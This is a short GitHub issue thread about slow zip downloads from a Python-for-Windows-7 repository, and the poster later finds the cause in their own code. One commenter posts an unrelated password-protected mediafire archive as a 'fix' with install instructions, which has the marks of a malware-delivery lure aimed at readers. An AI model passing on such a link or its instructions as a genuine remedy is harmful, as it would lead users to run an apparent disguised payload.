### ISSUE TITLE
Donwloading issues

### ISSUE THREAD

**Issue by brostosjoined** [adang1345/PythonWin7#31]
Am trying to download the zips using an automated script but it takes long or never finishes same occurs when clicking download raw file.
### Suggestion
Instead of uploading the zips directly to the folder why dont just make releases directly then in the folder you can provide the diff files or something equivalent

**Comment by brostosjoined** [comment]
Like placing the patches inside the respective folder

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by brostosjoined** [comment]
@rickdoq what is this, what am i supposed to do with it???

**Comment by brostosjoined** [comment]
nvm it was my slow code
